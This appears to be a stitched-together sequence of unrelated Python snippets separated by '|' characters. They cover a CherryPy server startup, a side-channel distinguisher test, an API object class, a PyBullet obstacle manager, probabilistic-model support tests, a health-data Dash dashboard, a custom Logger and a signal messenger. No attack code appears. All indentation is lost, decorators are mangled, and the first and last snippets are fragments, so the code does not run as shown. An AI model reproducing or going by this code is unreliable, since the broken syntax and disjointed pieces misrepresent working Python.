loggers = logging.Logger.manager.loggerDict.keys()
for name in loggers:
if name.startswith('cherrypy.'):
print(('Fixing %s.' % name))
logging.getLogger(name).propagate = 0
cherrypy.tree.graft(app, '/')
cherrypy.server.unsubscribe()
server = cherrypy._cpserver.Server()
server.socket_host = '0.0.0.0'
server.socket_port = 5001
server.thread_pool = 8
server.subscribe()
if hasattr(cherrypy.engine, 'signal_handler'):
cherrypy.engine.signal_handler.subscribe()
cherrypy.engine.start()
cherrypy.engine.block()
print()
print('Interrupt!') |
def test_distinguisher_mixin_handles_processed_traces_count():
d = DumbDistinguisher()
assert (d.processed_traces == 0)
data = np.random.randint(0, 255, (500, 16), dtype='uint8')
traces = np.random.randint(0, 255, (500, 16), dtype='uint8')
d.update(data=data, traces=traces)
assert (d.processed_traces == 500) |
class Invocation(BaseObject):
def __init__(self, api=None, id=None, latest_completed_at=None, status=None, status_code=None, **kwargs):
self.api = api
self.id = id
self.latest_completed_at = latest_completed_at
self.status = status
self.status_code = status_code
for (key, value) in kwargs.items():
setattr(self, key, value)
for key in self.to_dict():
if (getattr(self, key) is None):
try:
self._dirty_attributes.remove(key)
except KeyError:
continue
def latest_completed(self):
if self.latest_completed_at:
return dateutil.parser.parse(self.latest_completed_at)
_completed.setter
def latest_completed(self, latest_completed):
if latest_completed:
self.latest_completed_at = latest_completed |
class ObstacleManager(object):
def __init__(self, pb_client, dt, v_up_env, visualization=False):
self.pb_client = pb_client
self.obstacles = []
self.dt = dt
self.v_up_env = v_up_env
if visualization:
global gl_render, bullet_render, gl
from basecode.render import gl_render
from basecode.bullet import bullet_render
import OpenGL.GL as gl
def clear(self):
for obs in self.obstacles:
self.pb_client.removeBody(obs.body_id)
self.obstacles = []
def launch(self, obstacle):
p = self.pb_client
size = obstacle.size
if (obstacle.shape == Shape.BOX):
colShapeId = p.createCollisionShape(p.GEOM_BOX, halfExtents=[(0.5 * size[0]), (0.5 * size[1]), (0.5 * size[2])])
elif (obstacle.shape == Shape.SPHERE):
colShapeId = p.createCollisionShape(p.GEOM_SPHERE, radius=size[0])
else:
raise NotImplementedError
body_id = p.createMultiBody(baseMass=obstacle.mass, baseCollisionShapeIndex=colShapeId, basePosition=obstacle.p, baseOrientation=obstacle.Q)
p.resetBaseVelocity(body_id, obstacle.v, obstacle.w)
p.changeDynamics(body_id, (- 1), lateralFriction=obstacle.lateral_friction, spinningFriction=obstacle.spinning_friction, restitution=obstacle.restitution, linearDamping=obstacle.linear_damping, angularDamping=obstacle.angular_damping)
obstacle.body_id = body_id
self.obstacles.append(obstacle)
def throw(self, pos_target, num=1, duration=2.0, shape=Shape.BOX, vel=8.0, r_out=2.0, r_in=0.2, mass=2.0, size=(0.2 * np.ones(3)), h_min=0.5):
assert (r_out > r_in)
for _ in range(num):
d_out = math.random_unit_vector()
d_in = math.random_unit_vector()
p_from = (pos_target + (r_out * d_out))
p_projected_h = math.projectionOnVector(p_from, self.v_up_env)
h_cliped = max(np.linalg.norm(p_projected_h), h_min)
p_from = ((p_from - p_projected_h) + (h_cliped * self.v_up_env))
p_to = (pos_target + (r_in * d_in))
v_dir = (p_to - p_from)
v_dir = (v_dir / np.linalg.norm(v_dir))
p = p_from
Q = conversions.A2Q((math.random_unit_vector() * np.random.uniform((- np.pi), np.pi)))
v = (vel * v_dir)
w = np.zeros(3)
obs = Obstacle('', duration, shape, mass, size, p, Q, v, w)
self.launch(obs)
def update(self):
deleted_idx = []
for i in range(len(self.obstacles)):
obs = self.obstacles[i]
obs.duration -= self.dt
if (obs.duration <= 0.0):
self.pb_client.removeBody(obs.body_id)
deleted_idx.append(i)
else:
(p, Q, v, w) = bu.get_base_pQvw(self.pb_client, obs.body_id)
(obs.p, obs.Q, obs.v, obs.w) = (p, Q, v, w)
self.obstacles = filter_list_by_index(self.obstacles, deleted_idx, positive=False)
def render(self):
for obs in self.obstacles:
decay_start = 0.5
alpha = min(1.0, ((1.0 / decay_start) * obs.duration))
c = obs.color
T = conversions.Qp2T(obs.Q, obs.p)
rm.gl.glPushMatrix()
rm.gl_render.glTransform(T)
if (obs.shape == Shape.BOX):
geom_type = self.pb_client.GEOM_BOX
elif (obs.shape == Shape.SPHERE):
geom_type = self.pb_client.GEOM_SPHERE
else:
raise NotImplementedError
rm.bullet_render.render_geom(geom_type=geom_type, geom_size=obs.size, color=[c[0], c[1], c[2], alpha])
rm.bullet_render.render_geom_info(geom_type=geom_type, geom_size=obs.size)
rm.gl.glPopMatrix() |
class NodeSupportTest(unittest.TestCase):
def assertEqual(self, x: Any, y: Any) -> None:
if (isinstance(x, Tensor) and isinstance(y, Tensor)):
self.assertTrue(tensor_equality(x, y))
else:
super().assertEqual(x, y)
def test_node_supports(self) -> None:
self.maxDiff = None
rt = BMGRuntime()
rt.accumulate_graph([and1(), negexp1()], {})
cs = ComputeSupport()
expected_flip1 = '\ntensor(0.)\ntensor(1.)'
observed_flip1 = str(cs[rt._rv_to_node(flip1(0))])
self.assertEqual(expected_flip1.strip(), observed_flip1.strip())
expected_sum1 = '\ntensor(1.)\ntensor(2.)'
observed_sum1 = str(cs[rt._rv_to_node(sum1())])
self.assertEqual(expected_sum1.strip(), observed_sum1.strip())
expected_prod1 = '\ntensor(1.)\ntensor(2.)\ntensor(4.)'
observed_prod1 = str(cs[rt._rv_to_node(prod1())])
self.assertEqual(expected_prod1.strip(), observed_prod1.strip())
expected_pow1 = '\ntensor(1.)\ntensor(16.)\ntensor(2.)\ntensor(256.)\ntensor(4.)\n'
observed_pow1 = str(cs[rt._rv_to_node(pow1())])
self.assertEqual(expected_pow1.strip(), observed_pow1.strip())
expected_ge1 = '\ntensor(False)\ntensor(True)\n'
observed_ge1 = str(cs[rt._rv_to_node(ge1())])
self.assertEqual(expected_ge1.strip(), observed_ge1.strip())
expected_and1 = expected_ge1
observed_and1 = str(cs[rt._rv_to_node(and1())])
self.assertEqual(expected_and1.strip(), observed_and1.strip())
expected_exp1 = "['-2', '-54', '-7']"
results = [str(int(t)) for t in cs[rt._rv_to_node(negexp1())]]
results.sort()
self.assertEqual(expected_exp1.strip(), str(results).strip())
def test_bernoulli_support(self) -> None:
self.maxDiff = None
rt = BMGRuntime()
rt.accumulate_graph([flip2(0)], {})
sample = rt._rv_to_node(flip2(0))
s = ComputeSupport()
observed = str(s[sample])
expected = '\ntensor([[0., 0.]])\ntensor([[0., 1.]])\ntensor([[1., 0.]])\ntensor([[1., 1.]])'
self.assertEqual(expected.strip(), observed.strip())
def test_categorical_support(self) -> None:
self.maxDiff = None
rt = BMGRuntime()
rt.accumulate_graph([cat3(), cat2_3(), cat8_3()], {})
s = ComputeSupport()
c3 = rt._rv_to_node(cat3())
observed_c3 = str(s[c3])
expected_c3 = '\ntensor(0)\ntensor(1)\ntensor(2)\n'
self.assertEqual(expected_c3.strip(), observed_c3.strip())
c23 = rt._rv_to_node(cat2_3())
observed_c23 = str(s[c23])
expected_c23 = '\ntensor([0, 0])\ntensor([0, 1])\ntensor([0, 2])\ntensor([1, 0])\ntensor([1, 1])\ntensor([1, 2])\ntensor([2, 0])\ntensor([2, 1])\ntensor([2, 2])\n'
self.assertEqual(expected_c23.strip(), observed_c23.strip())
c83 = rt._rv_to_node(cat8_3())
observed_c23 = s[c83]
self.assertTrue((observed_c23 is TooBig))
def test_stochastic_tensor_support(self) -> None:
self.maxDiff = None
rt = BMGRuntime()
rt.accumulate_graph([to_tensor()], {})
tm = rt._rv_to_node(to_tensor())
s = ComputeSupport()
observed = str(s[tm])
expected = '\ntensor([2.5000, 0.0000, 0.0000, 0.0000])\ntensor([2.5000, 0.0000, 0.0000, 1.0000])\ntensor([2.5000, 0.0000, 1.0000, 0.0000])\ntensor([2.5000, 0.0000, 1.0000, 1.0000])\ntensor([2.5000, 1.0000, 0.0000, 0.0000])\ntensor([2.5000, 1.0000, 0.0000, 1.0000])\ntensor([2.5000, 1.0000, 1.0000, 0.0000])\ntensor([2.5000, 1.0000, 1.0000, 1.0000])\n'
self.assertEqual(expected.strip(), observed.strip())
def test_infinite_support(self) -> None:
self.maxDiff = None
rt = BMGRuntime()
rt.accumulate_graph([normal()], {})
sample = rt._rv_to_node(normal())
s = ComputeSupport()
observed = s[sample]
self.assertEqual(Infinite, observed)
def test_switch_support(self) -> None:
self.maxDiff = None
rt = BMGRuntime()
rt.accumulate_graph([switch_inf(), switch_4()], {})
s = ComputeSupport()
switch_inf_sample = rt._rv_to_node(switch_inf())
observed_inf = s[switch_inf_sample]
self.assertEqual(Infinite, observed_inf)
switch_4_sample = rt._rv_to_node(switch_4())
observed_4 = str(s[switch_4_sample])
expected_4 = '\ntensor(0.)\ntensor(1.)\ntensor(2)\ntensor(3)\n'
self.assertEqual(expected_4.strip(), observed_4.strip()) |
class ModuleBuild(Build):
__mapper_args__ = {'polymorphic_identity': ContentType.module}
def nvr_name(self):
return self._get_kojiinfo()['name']
def nvr_version(self):
return self._get_kojiinfo()['version']
def nvr_release(self):
return self._get_kojiinfo()['release'] |
class _A100(_A100_Base):
partition_1g_5gb = _A100_Base.partitioned('1g.5gb')
partition_2g_10gb = _A100_Base.partitioned('2g.10gb')
partition_3g_20gb = _A100_Base.partitioned('3g.20gb')
partition_4g_20gb = _A100_Base.partitioned('4g.20gb')
partition_7g_40gb = _A100_Base.partitioned('7g.40gb') |
def generate_readiness_modal_summary(days=7):
date = (datetime.now().date() - timedelta(days=days))
df = pd.read_sql(sql=app.session.query(ouraReadinessSummary).filter((ouraReadinessSummary.report_date > date)).statement, con=engine, index_col='report_date')
hrv_df = pd.read_sql(sql=app.session.query(ouraSleepSummary.report_date, ouraSleepSummary.rmssd, ouraSleepSummary.hr_lowest).filter((ouraSleepSummary.report_date > date)).statement, con=engine, index_col='report_date')
app.session.remove()
df = df.merge(hrv_df, how='left', left_index=True, right_index=True)
if (len(df) > 1):
(hrv_slope, hrv_intercept) = np.polyfit(df.reset_index().index, df['rmssd'], 1)
hrv_insight = 'Your {} HRV trend implies that {}'.format(('downward' if (hrv_slope < 0) else 'upwards'), ('you should keep an eye on your recovery status' if (hrv_slope < 0) else "you've recovered well"))
(rhr_slope, rhr_intercept) = np.polyfit(df.reset_index().index, df['hr_lowest'], 1)
rhr_insight = 'Your {} RHR trend implies that {}'.format(('downward' if (rhr_slope < 0) else 'upwards'), ("you've recovered well" if (rhr_slope < 0) else 'something may be challenging your recovery'))
else:
(hrv_slope, hrv_intercept) = (0, 0)
(rhr_slope, rhr_intercept) = (0, 0)
hrv_insight = 'Not enough data to calculate insights from your HRV trend'
rhr_insight = 'Not enough data to calculate insights from your RHR trend'
df['hrv_trend'] = ((df.reset_index().index * hrv_slope) + hrv_intercept)
df['rhr_trend'] = ((df.reset_index().index * rhr_slope) + rhr_intercept)
readiness_last_7_graph = dcc.Graph(config={'displayModeBar': False}, figure={'data': [go.Bar(name='Readiness', x=df.index, y=df['score'], yaxis='y', text=df['score'], hoverinfo='text', hovertext=['Readiness: <b>{:.0f}'.format(x) for x in df['score']], textposition='auto', marker={'color': light_blue})], 'layout': go.Layout(height=300, font=dict(size=10, color=white), xaxis=dict(showline=True, color=white, showticklabels=True, showgrid=False, tickvals=df.index, tickformat='%a'), yaxis=dict(showticklabels=True, showgrid=True, gridcolor='rgb(66,66,66)', color=white, tickformat=',d'), showlegend=False, margin={'l': 20, 'b': 20, 't': 0, 'r': 0})})
hrv_last_7_graph = dcc.Graph(config={'displayModeBar': False}, figure={'data': [go.Scatter(name='HR Variability', x=df.index, y=round(df['rmssd']), yaxis='y', text=['HRV: <b>{:.0f} ms'.format(x) for x in df['rmssd']], hoverinfo='text', mode='lines+markers', line={'dash': 'dot', 'color': teal, 'width': 2}, showlegend=False, marker={'size': 5}), go.Scatter(name='HRV Trend', x=df.index, y=df['hrv_trend'], yaxis='y', hoverinfo='none', mode='lines', line={'color': teal, 'width': 2}, showlegend=False), go.Scatter(name='Average', x=df.index, y=[df['rmssd'].mean() for x in df.index], mode='lines+text', text=[('Avg: <b>{:.0f} ms'.format(df['rmssd'].mean()) if (x == df.index.max()) else '') for x in df.index], textfont=dict(size=11, color='rgb(150,150,150)'), textposition='top left', hoverinfo='none', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 1}, showlegend=False)], 'layout': go.Layout(height=300, font=dict(size=10, color=white), xaxis=dict(showline=True, color=white, showticklabels=True, showgrid=False, tickvals=df.index, tickformat='%a'), yaxis=dict(showticklabels=True, showgrid=True, gridcolor='rgb(66,66,66)', color=white, tickformat=',d'), showlegend=False, margin={'l': 20, 'b': 20, 't': 0, 'r': 0})})
rhr_last_7_graph = dcc.Graph(config={'displayModeBar': False}, figure={'data': [go.Scatter(name='Resting HR', x=df.index, y=round(df['hr_lowest']), yaxis='y', text=['RHR: <b>{:.0f} bpm'.format(x) for x in df['hr_lowest']], hoverinfo='text', mode='lines+markers', line={'dash': 'dot', 'color': white, 'width': 2}, showlegend=False, marker={'size': 5}), go.Scatter(name='RHR Trend', x=df.index, y=df['rhr_trend'], yaxis='y', hoverinfo='none', mode='lines', line={'color': white, 'width': 2}, showlegend=False), go.Scatter(name='Average', x=df.index, y=[df['hr_lowest'].mean() for x in df.index], mode='lines+text', text=[('Avg: <b>{:.0f} bpm'.format(df['hr_lowest'].mean()) if (x == df.index.max()) else '') for x in df.index], textfont=dict(size=11, color='rgb(150,150,150)'), textposition='top left', hoverinfo='none', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 1}, showlegend=False)], 'layout': go.Layout(height=300, font=dict(size=10, color=white), xaxis=dict(showline=True, color=white, showticklabels=True, showgrid=False, tickvals=df.index, tickformat='%a'), yaxis=dict(showticklabels=True, showgrid=True, gridcolor='rgb(66,66,66)', color=white, tickformat=',d'), showlegend=False, margin={'l': 20, 'b': 20, 't': 0, 'r': 0})})
return [html.Div(id='readiness-modal-last-7-container', className='row align-items-center text-center mb-2', style={'whiteSpace': 'normal'}, children=[html.Div(id='readiness-score-last-7', className='col-lg-4', children=[html.Div(id='readiness-score-last-7-title', children=[html.P('Your average readiness score for the last 7 days is {:.0f}'.format(df['score'].mean()))]), html.Div(id='readiness-score-last-7-chart', children=[readiness_last_7_graph])]), html.Div(id='hrv-score-last-7', className='col-lg-4', children=[html.Div(id='hrv-score-last-7-title', children=[html.P(hrv_insight)]), html.Div(id='hrv-score-last-7-chart', children=[hrv_last_7_graph])]), html.Div(id='rhr-score-last-7', className='col-lg-4', children=[html.Div(id='rhr-score-last-7-title', children=[html.P(rhr_insight)]), html.Div(id='rhr-score-last-7-chart', children=[rhr_last_7_graph])])]), html.Div(className='row', children=[html.Div(id='readiness-score-correlations', className='col-lg-6', children=[html.Div(id='readiness-score-correlation-title', className='col-lg-12 text-center', children=[html.P('Readiness Score Correlations (L6M)')]), html.Div(id='readiness-score-correlation-chart', className='col-lg-12', children=[generate_correlation_table(10, 'Readiness score', 180)])]), html.Div(className='col-lg-6', children=[html.Div(className='row align-items-center text-center', children=[html.Div(id='readiness-groupby-controls', className='col-lg-12 mb-2 mt-2', children=[dbc.Button('Year', id='readiness-year-button', n_clicks=0, size='sm', className='mr-3'), dbc.Button('Month', id='readiness-month-button', n_clicks=0, size='sm', className='mr-3'), dbc.Button('Week', id='readiness-week-button', n_clicks=0, size='sm', className='mr-3'), dbc.Button('Day', id='readiness-day-button', size='sm')])]), html.Div(className='row', children=[html.Div(className='col-lg-12', children=[dbc.Spinner(color='info', children=[dcc.Graph(id='readiness-modal-full-chart', config={'displayModeBar': False})])])])])])] |
def hash_node(node):
if isinstance(node, LeafNode):
return hash(node.serialize())
elif isinstance(node, BranchNode):
serialized = node.serialize()
return (None if (serialized is None) else hash(serialized))
elif (node is None):
return None
else:
raise Exception('Bad node type') |
class Logger():
ALL = (- 5)
NOTHING = (- 4)
FATAL = (- 3)
TRACEBACK = (- 2)
ERROR = (- 1)
WARNING = 0
stdout = _StdoutLog()
stderr = _StderrLog()
syslog = _SyslogLog()
def __init__(self, info_max=5, debug_max=10):
self._level = {}
self._debug_level = {}
self._format = ''
self._date_format = ''
self._label = {}
self._debug_label = {}
self._logging = {}
self._debug_logging = {}
self._domains = {}
self._debug_domains = {}
if (info_max < 1):
raise ValueError(('Logger: info_max %d is too low' % info_max))
if (debug_max < 0):
raise ValueError(('Logger: debug_max %d is too low' % debug_max))
self.NO_INFO = self.WARNING
self.INFO_MAX = info_max
self.NO_DEBUG = 0
self.DEBUG_MAX = debug_max
self.setInfoLogLabel(self.FATAL, 'FATAL ERROR: ')
self.setInfoLogLabel(self.TRACEBACK, '')
self.setInfoLogLabel(self.ERROR, 'ERROR: ')
self.setInfoLogLabel(self.WARNING, 'WARNING: ')
for _level in range(1, (self.INFO_MAX + 1)):
setattr(self, ('INFO%d' % _level), _level)
self.setInfoLogLabel(_level, '')
setattr(self, ('info%d' % _level), (lambda self, x: (lambda message, *args, **kwargs: self.info(x, message, *args, **kwargs)))(self, _level))
for _level in range(1, (self.DEBUG_MAX + 1)):
setattr(self, ('DEBUG%d' % _level), _level)
self.setDebugLogLabel(_level, ('DEBUG%d: ' % _level))
setattr(self, ('debug%d' % _level), (lambda self, x: (lambda message, *args, **kwargs: self.debug(x, message, *args, **kwargs)))(self, _level))
self.setInfoLogLevel(self.INFO1)
self.setDebugLogLevel(self.NO_DEBUG)
self.setFormat('%(label)s%(message)s')
self.setDateFormat('%d %b %Y %H:%M:%S')
self.setInfoLogging('*', self.stderr, [self.FATAL, self.ERROR, self.WARNING])
self.setInfoLogging('*', self.stdout, [i for i in range(self.INFO1, (self.INFO_MAX + 1))])
self.setDebugLogging('*', self.stdout, [i for i in range(1, (self.DEBUG_MAX + 1))])
def close(self):
for level in range(self.FATAL, (self.DEBUG_MAX + 1)):
if (level not in self._logging):
continue
for (dummy, target, dummy) in self._logging[level]:
target.close()
def getInfoLogLevel(self, domain='*'):
self._checkDomain(domain)
if (domain in self._level):
return self._level[domain]
return self.NOTHING
def setInfoLogLevel(self, level, domain='*'):
self._checkDomain(domain)
if (level < self.NOTHING):
level = self.NOTHING
if (level > self.INFO_MAX):
level = self.INFO_MAX
self._level[domain] = level
def getDebugLogLevel(self, domain='*'):
self._checkDomain(domain)
if (domain in self._debug_level):
return (self._debug_level[domain] + self.NO_DEBUG)
return self.NO_DEBUG
def setDebugLogLevel(self, level, domain='*'):
self._checkDomain(domain)
if (level < 0):
level = 0
if (level > self.DEBUG_MAX):
level = self.DEBUG_MAX
self._debug_level[domain] = (level - self.NO_DEBUG)
def getFormat(self):
return self._format
def setFormat(self, _format):
self._format = _format
def getDateFormat(self):
return self._date_format
def setDateFormat(self, _format):
self._date_format = _format
def setInfoLogLabel(self, level, label):
levels = self._getLevels(level)
for level in levels:
self._checkLogLevel(level, min_level=self.FATAL, max_level=self.INFO_MAX)
self._label[level] = label
def setDebugLogLabel(self, level, label):
levels = self._getLevels(level, is_debug=1)
for level in levels:
self._checkLogLevel(level, min_level=self.INFO1, max_level=self.DEBUG_MAX)
self._debug_label[level] = label
def setInfoLogging(self, domain, target, level=ALL, fmt=None):
self._setLogging(domain, target, level, fmt, is_debug=0)
def setDebugLogging(self, domain, target, level=ALL, fmt=None):
self._setLogging(domain, target, level, fmt, is_debug=1)
def addInfoLogging(self, domain, target, level=ALL, fmt=None):
self._addLogging(domain, target, level, fmt, is_debug=0)
def addDebugLogging(self, domain, target, level=ALL, fmt=None):
self._addLogging(domain, target, level, fmt, is_debug=1)
def delInfoLogging(self, domain, target, level=ALL, fmt=None):
self._delLogging(domain, target, level, fmt, is_debug=0)
def delDebugLogging(self, domain, target, level=ALL, fmt=None):
self._delLogging(domain, target, level, fmt, is_debug=1)
def isInfoLoggingHere(self, level):
return self._isLoggingHere(level, is_debug=0)
def isDebugLoggingHere(self, level):
return self._isLoggingHere(level, is_debug=1)
def fatal(self, _format, *args, **kwargs):
self._checkKWargs(kwargs)
kwargs['is_debug'] = 0
self._log(self.FATAL, _format, *args, **kwargs)
def error(self, _format, *args, **kwargs):
self._checkKWargs(kwargs)
kwargs['is_debug'] = 0
self._log(self.ERROR, _format, *args, **kwargs)
def warning(self, _format, *args, **kwargs):
self._checkKWargs(kwargs)
kwargs['is_debug'] = 0
self._log(self.WARNING, _format, *args, **kwargs)
def info(self, level, _format, *args, **kwargs):
self._checkLogLevel(level, min_level=1, max_level=self.INFO_MAX)
self._checkKWargs(kwargs)
kwargs['is_debug'] = 0
self._log((level + self.NO_INFO), _format, *args, **kwargs)
def debug(self, level, _format, *args, **kwargs):
self._checkLogLevel(level, min_level=1, max_level=self.DEBUG_MAX)
self._checkKWargs(kwargs)
kwargs['is_debug'] = 1
self._log(level, _format, *args, **kwargs)
def exception(self):
self._log(self.TRACEBACK, traceback.format_exc(), args=[], kwargs={})
def _checkLogLevel(self, level, min_level, max_level):
if ((level < min_level) or (level > max_level)):
raise ValueError(('Level %d out of range, should be [%d..%d].' % (level, min_level, max_level)))
def _checkKWargs(self, kwargs):
if (not kwargs):
return
for key in kwargs.keys():
if (key not in ['nl', 'fmt', 'nofmt']):
raise ValueError(("Key '%s' is not allowed as argument for logging." % key))
def _checkDomain(self, domain):
if ((not domain) or (domain == '')):
raise ValueError(("Domain '%s' is not valid." % domain))
def _getLevels(self, level, is_debug=0):
if (level != self.ALL):
if (isinstance(level, list) or isinstance(level, tuple)):
levels = level
else:
levels = [level]
for level in levels:
if is_debug:
self._checkLogLevel(level, min_level=1, max_level=self.DEBUG_MAX)
else:
self._checkLogLevel(level, min_level=self.FATAL, max_level=self.INFO_MAX)
elif is_debug:
levels = [i for i in range(self.DEBUG1, self.DEBUG_MAX)]
else:
levels = [i for i in range(self.FATAL, self.INFO_MAX)]
return levels
def _getTargets(self, target):
if (isinstance(target, list) or isinstance(target, tuple)):
targets = target
else:
targets = [target]
for _target in targets:
if (not issubclass(_target.__class__, LogTarget)):
raise ValueError(("'%s' is no valid logging target." % _target.__class__.__name__))
return targets
def _genDomains(self, is_debug=0):
if is_debug:
_domains = self._debug_domains
_logging = self._debug_logging
_range = (1, (self.DEBUG_MAX + 1))
else:
_domains = self._domains
_logging = self._logging
_range = (self.FATAL, (self.INFO_MAX + 1))
if (len(_domains) > 0):
_domains.clear()
for level in range(_range[0], _range[1]):
if (level not in _logging):
continue
for (domain, dummy, dummy) in _logging[level]:
if (domain not in _domains):
_domains.setdefault(level, []).append(domain)
def _setLogging(self, domain, target, level=ALL, fmt=None, is_debug=0):
self._checkDomain(domain)
levels = self._getLevels(level, is_debug)
targets = self._getTargets(target)
if is_debug:
_logging = self._debug_logging
else:
_logging = self._logging
for level in levels:
for target in targets:
_logging[level] = [(domain, target, fmt)]
self._genDomains(is_debug)
def _addLogging(self, domain, target, level=ALL, fmt=None, is_debug=0):
self._checkDomain(domain)
levels = self._getLevels(level, is_debug)
targets = self._getTargets(target)
if is_debug:
_logging = self._debug_logging
else:
_logging = self._logging
for level in levels:
for target in targets:
_logging.setdefault(level, []).append((domain, target, fmt))
self._genDomains(is_debug)
def _delLogging(self, domain, target, level=ALL, fmt=None, is_debug=0):
self._checkDomain(domain)
levels = self._getLevels(level, is_debug)
targets = self._getTargets(target)
if is_debug:
_logging = self._debug_logging
else:
_logging = self._logging
for _level in levels:
for target in targets:
if (_level not in _logging):
continue
if ((domain, target, fmt) in _logging[_level]):
_logging[_level].remove((domain, target, fmt))
if (len(_logging[_level]) == 0):
del _logging[_level]
continue
if (level != self.ALL):
raise ValueError(('No matching logging for level %d, domain %s, target %s and format %s.' % (_level, domain, target.__class__.__name__, fmt)))
self._genDomains(is_debug)
def _isLoggingHere(self, level, is_debug=0):
_dict = self._genDict(level, is_debug)
if (not _dict):
return False
point_domain = (_dict['domain'] + '.')
if is_debug:
_logging = self._debug_logging
else:
_logging = self._logging
for (domain, dummy, dummy) in _logging[level]:
if ((domain == '*') or point_domain.startswith(domain) or fnmatch.fnmatchcase(_dict['domain'], domain)):
return True
return False
def _getClass(self, frame):
if (frame.f_code.co_argcount > 0):
selfname = frame.f_code.co_varnames[0]
if (selfname in frame.f_locals):
_self = frame.f_locals[selfname]
obj = self._getClass2(_self.__class__, frame.f_code)
if obj:
return obj
module = inspect.getmodule(frame.f_code)
code = frame.f_code
if (code.co_name in module.__dict__):
if (hasattr(module.__dict__[code.co_name], 'func_code') and (module.__dict__[code.co_name].__code__ == code)):
return None
for (dummy, obj) in module.__dict__.items():
if isinstance(obj, types.ClassType):
if hasattr(obj, code.co_name):
value = getattr(obj, code.co_name)
if isinstance(value, types.FunctionType):
if (value.__code__ == code):
return obj
return None
def _getClass2(self, obj, code):
for value in obj.__dict__.values():
if isinstance(value, types.FunctionType):
if (value.__code__ == code):
return obj
for base in obj.__bases__:
_obj = self._getClass2(base, code)
if _obj:
return _obj
return None
def _log(self, level, _format, *args, **kwargs):
is_debug = 0
if ('is_debug' in kwargs):
is_debug = kwargs['is_debug']
nl = 1
if ('nl' in kwargs):
nl = kwargs['nl']
nofmt = 0
if ('nofmt' in kwargs):
nofmt = kwargs['nofmt']
_dict = self._genDict(level, is_debug)
if (not _dict):
return
if (len(args) > 1):
_dict['message'] = (_format % args)
elif (len(args) == 1):
_dict['message'] = (_format % args[0])
else:
_dict['message'] = _format
point_domain = (_dict['domain'] + '.')
if is_debug:
_logging = self._debug_logging
else:
_logging = self._logging
used_targets = []
for (domain, target, _format) in _logging[level]:
if (target in used_targets):
continue
if ((domain == '*') or point_domain.startswith((domain + '.')) or fnmatch.fnmatchcase(_dict['domain'], domain)):
if (not _format):
_format = self._format
if ('fmt' in kwargs):
_format = kwargs['fmt']
if nofmt:
target.write(_dict['message'], level, self, is_debug)
else:
target.write((_format % _dict), level, self, is_debug)
if nl:
target.write('\n', level, self, is_debug)
used_targets.append(target)
def _genDict(self, level, is_debug=0):
check_domains = []
simple_match = False
if is_debug:
_dict = self._debug_level
_domains = self._debug_domains
_label = self._debug_label
else:
_dict = self._level
_domains = self._domains
_label = self._label
for domain in _dict:
if (domain == '*'):
if (_dict[domain] >= level):
simple_match = True
if (len(check_domains) > 0):
check_domains = []
break
elif (_dict[domain] >= level):
check_domains.append(domain)
if ((not simple_match) and (len(check_domains) < 1)):
return None
if (level not in _domains):
return None
f = inspect.currentframe()
while (f and f.f_back and (f.f_globals['__name__'] == self.__module__)):
f = f.f_back
if (not f):
raise ValueError('Frame information not available.')
module_name = f.f_globals['__name__']
point_module = (module_name + '.')
for domain in check_domains:
if point_module.startswith(domain):
check_domains = []
break
co = f.f_code
_len = len(module_name)
for domain in _domains[level]:
i = domain.find('*')
if (i == 0):
continue
elif (i > 0):
d = domain[:i]
else:
d = domain
if (_len >= len(d)):
if (not module_name.startswith(d)):
return None
elif (not d.startswith(module_name)):
return None
level_str = ''
if (level in _label):
level_str = _label[level]
_dict = {'file': co.co_filename, 'line': f.f_lineno, 'module': module_name, 'class': '', 'function': co.co_name, 'domain': '', 'label': level_str, 'level': level, 'date': time.strftime(self._date_format, time.localtime())}
if (_dict['function'] == '?'):
_dict['function'] = ''
domain_needed = False
for domain in _domains[level]:
if (domain == '*'):
continue
domain_needed = True
break
if ((self._format.find('%(domain)') >= 0) or (self._format.find('%(class)') >= 0) or domain_needed or (len(check_domains) > 0)):
obj = self._getClass(f)
if obj:
_dict['class'] = obj.__name__
_dict['domain'] = ('' + _dict['module'])
if (_dict['class'] != ''):
_dict['domain'] += ('.' + _dict['class'])
if (_dict['function'] != ''):
_dict['domain'] += ('.' + _dict['function'])
if (len(check_domains) < 1):
return _dict
point_domain = (_dict['domain'] + '.')
for domain in check_domains:
if (point_domain.startswith(domain) or fnmatch.fnmatchcase(_dict['domain'], domain)):
return _dict
return None |
class Messenger():
_shared_data = _saved
def __init__(self):
self.__dict__ = self._shared_data
if (not hasattr(self, '_signals')):
self._signals = {}
self._catch_all = ['AnyEvent', 'all']
def connect(self, obj, event, callback):
typ = type(callback)
key = hash(obj)
if (not (key in self._signals)):
self._signals[key] = {}
signals = self._signals[key]
if (not (event in signals)):
signals[event] = {}
slots = signals[event]
callback_key = hash(callback)
if (typ is types.FunctionType):
slots[callback_key] = (None, callback)
elif (typ is types.MethodType):
obj = weakref.ref(callback.__self__)
name = callback.__name__
slots[callback_key] = (obj, name)
else:
raise MessengerError(('Callback must be a function or method. You passed a %s.' % str(callback)))
def disconnect(self, obj, event=None, callback=None, obj_is_hash=False):
signals = self._signals
if obj_is_hash:
key = obj
else:
key = hash(obj)
if (not (key in signals)):
return
if (callback is None):
if (event is None):
del signals[key]
else:
del signals[key][event]
else:
del signals[key][event][hash(callback)]
def send(self, source, event, *args, **kw_args):
try:
sigs = self._get_signals(source)
except (MessengerError, KeyError):
return
events = self._catch_all[:]
if (event not in events):
events.append(event)
for evt in events:
if (evt in sigs):
slots = sigs[evt]
for key in list(slots.keys()):
(obj, meth) = slots[key]
if obj:
inst = obj()
if inst:
getattr(inst, meth)(source, event, *args, **kw_args)
else:
del slots[key]
else:
meth(source, event, *args, **kw_args)
def is_registered(self, obj):
try:
sigs = self._get_signals(obj)
except MessengerError:
return 0
else:
return 1
def get_signal_names(self, obj):
return list(self._get_signals(obj).keys())
def _get_signals(self, obj):
ret = self._signals.get(hash(obj))
if (ret is None):
raise MessengerError(('No such object: %s, has registered itself with the messenger.' % obj))
else:
return ret |
class TestCompanion(I3LayoutScenario):
def test_scenario(self):
for params in self.layout_params():
self.senario(params)
self._close_all()
def layout(self, params: List) -> str:
(odd_companion_ratio, even_companion_ratio, companion_position) = params
return f'companion {odd_companion_ratio} {even_companion_ratio} {companion_position}'
def layout_params(self) -> List:
return [[0.3, 0.4, 'up'], [0.3, 0.4, 'down'], [0.3, 0.4, 'alt-up'], [0.3, 0.4, 'alt-down']]
def alternate_layout(self) -> str:
return 'hstack'
def validate(self, args):
